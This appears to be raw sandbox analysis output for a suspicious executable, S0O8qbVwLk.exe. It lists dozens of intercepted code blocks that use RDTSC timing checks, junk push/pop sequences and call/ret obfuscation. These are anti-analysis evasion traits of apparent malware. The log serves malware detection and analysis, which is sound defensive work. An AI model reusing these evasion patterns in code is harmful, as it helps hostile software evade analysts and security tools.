Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F5E second address: F50F64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F51F1C second address: F51F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F64 second address: F50F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F7C second address: F50F9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8E2D68FC67h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F9E second address: F50FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F52F5F second address: F52F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50FA4 second address: F50FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F52F63 second address: F52F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F510B1 second address: F510BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F53FF4 second address: F53FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F53FF8 second address: F54002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F54002 second address: F54006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F55090 second address: F550EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov edx, edi 0x0000000f popad 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F8E2D690EE8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, 74113260h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 jmp 00007F8E2D690EF5h 0x0000003c pop edi 0x0000003d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F560B6 second address: F560BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F560BA second address: F560BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F560BE second address: F560C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F56165 second address: F56169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F56169 second address: F5616F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5616F second address: F56175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5526A second address: F5530C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F8E2D68FC58h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2BC7h], esi 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007F8E2D68FC68h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007F8E2D68FC58h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D238Ah], esi 0x0000005c mov eax, dword ptr [ebp+122D054Dh] 0x00000062 add dword ptr [ebp+122D2881h], edx 0x00000068 mov ebx, dword ptr [ebp+122D30EBh] 0x0000006e push FFFFFFFFh 0x00000070 sub dword ptr [ebp+122D1CD0h], edx 0x00000076 mov di, si 0x00000079 nop 0x0000007a pushad 0x0000007b pushad 0x0000007c push esi 0x0000007d pop esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F57133 second address: F5713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5713A second address: F57140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5530C second address: F5532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8E2D690EEDh 0x0000000b jng 00007F8E2D690EE6h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F57140 second address: F57144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5532C second address: F55334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F572EF second address: F572F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F582AD second address: F582B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F58359 second address: F58375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5A145 second address: F5A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5A149 second address: F5A152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5A152 second address: F5A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8E2D690EE6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F8E2D690EE8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b add edi, 3B39CB81h 0x00000031 push 00000000h 0x00000033 mov bx, B8DDh 0x00000037 xchg eax, esi 0x00000038 jo 00007F8E2D690EF0h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F621F3 second address: F621FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F621FF second address: F62217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8E2D690EEAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6232D second address: F62362 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8E2D68FC5Ch 0x00000008 pop edi 0x00000009 jmp 00007F8E2D68FC5Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jbe 00007F8E2D68FC56h 0x00000019 jo 00007F8E2D68FC56h 0x0000001f jne 00007F8E2D68FC56h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F62362 second address: F62377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8E2D690EF0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F626B2 second address: F626D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 jc 00007F8E2D68FC56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F626D5 second address: F626DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68564 second address: F68569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68569 second address: F6856F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6856F second address: F68591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC63h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F8E2D68FC56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68D25 second address: F68D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68D2B second address: F68D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E0DB second address: F6E0E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8E2D690EE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E22A second address: F6E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E230 second address: F6E243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E3E1 second address: F6E3EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E67E second address: F6E686 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E686 second address: F6E69B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E69B second address: F6E6C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E2D690EE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E2D690EF9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E6C2 second address: F6E6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E81C second address: F6E820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E99E second address: F6E9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E9A3 second address: F6E9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6EB42 second address: F6EB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8E2D68FC56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6EB4E second address: F6EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F8E2D690EE6h 0x0000000e jl 00007F8E2D690EE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFA53F second address: EFA544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFA544 second address: EFA550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F8E2D690EE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFA550 second address: EFA559 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F465DD second address: F465E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F465E2 second address: F24E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D21BBh] 0x00000013 call dword ptr [ebp+122D3629h] 0x00000019 pushad 0x0000001a jbe 00007F8E2D68FC58h 0x00000020 push edi 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA4CD7 second address: FA4CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5509 second address: FA5511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5511 second address: FA5530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8E2D690EF2h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5530 second address: FA5534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA566B second address: FA567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F8E2D690EEBh 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA567C second address: FA56A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F8E2D68FC56h 0x0000000f jmp 00007F8E2D68FC62h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB25E4 second address: FB25E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB0BF8 second address: FB0C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB0EC3 second address: FB0ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E2D690EECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB0ECF second address: FB0ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1252 second address: FB128B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8E2D690EF0h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8E2D690EF5h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F8E2D690EE6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB140E second address: FB142A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB142A second address: FB1480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8E2D690EF8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8E2D690EF8h 0x0000001a ja 00007F8E2D690EE6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1480 second address: FB1484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1CED second address: FB1CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1CF7 second address: FB1D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F8E2D68FC63h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F8E2D68FC58h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01A8 second address: FB01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01AD second address: FB01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01B2 second address: FB01EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F8E2D690EEBh 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F8E2D690EF9h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01EA second address: FB01F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01F1 second address: FB01FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E2D690EEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB882F second address: FB8837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB8837 second address: FB883D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB883D second address: FB8842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB8842 second address: FB884C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E2D690EEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB884C second address: FB885A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB885A second address: FB887B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8E2D690EE6h 0x0000000e jmp 00007F8E2D690EF3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB887B second address: FB8881 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB8881 second address: FB8887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FC5859 second address: FC5867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
